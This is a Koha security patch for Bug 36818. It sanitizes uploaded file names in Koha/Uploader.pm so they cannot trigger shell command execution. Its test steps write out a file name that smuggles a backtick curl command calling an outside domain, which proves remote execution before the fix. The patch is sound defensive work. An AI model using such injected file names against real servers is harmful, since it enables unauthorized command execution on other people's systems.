From 9e16ed4467da850ad63652906a2dc3011d20a338 Mon Sep 17 00:00:00 2001 From: Chris Cormack Date: Wed, 8 May 2024 22:41:43 +0000 Subject: [PATCH] Bug 36818: Escape characters in file names uploaded MIME-Version: 1.0 Content-Type: text/plain; charset=utf8 Content-Transfer-Encoding: 8bit To test: 1/ create a file named something like 'execute`curl blog.bigballofwax.co.nz`.zip' Where the domain is one you can watch the logs from 2/ Upload this file as a cover image 3/ Check /var/lib/koha/sitename/tmp/koha_sitename/ and see unescaped filenames 4/ Choose process, check the logs of the webserver see the connection has been made 5/ Apply the patch 5/ Repeat 2 & 3 and see the filename is now escaped 6/ Choose process and check no errors but no no remote execution occurs 7/ Test uploading actual zip file and images still works Signed-off-by: Amit Gupta Signed-off-by: Martin Renvoize (cherry picked from commit 14bdaae3f257a321f8ec0d32c6b1e9bc6ed6033d) Signed-off-by: Frédéric Demians --- Koha/Uploader.pm | 1 + 1 file changed, 1 insertion(+) diff --git a/Koha/Uploader.pm b/Koha/Uploader.pm index 8fbb06a14c..39aee036b9 100644 --- a/Koha/Uploader.pm +++ b/Koha/Uploader.pm @@ -264,6 +264,7 @@ sub _dir { sub _hook { my ( $self, $filename, $buffer, $bytes_read, $data ) = @_; $filename= Encode::decode_utf8( $filename ); # UTF8 chars in filename + $filename =~ s/[^A-Za-z0-9\-\.]//g; $self->_compute( $filename, $buffer ); my $fh = $self->_fh( $filename ) // $self->_create_file( $filename ); print $fh $buffer if $fh; -- 2.39.5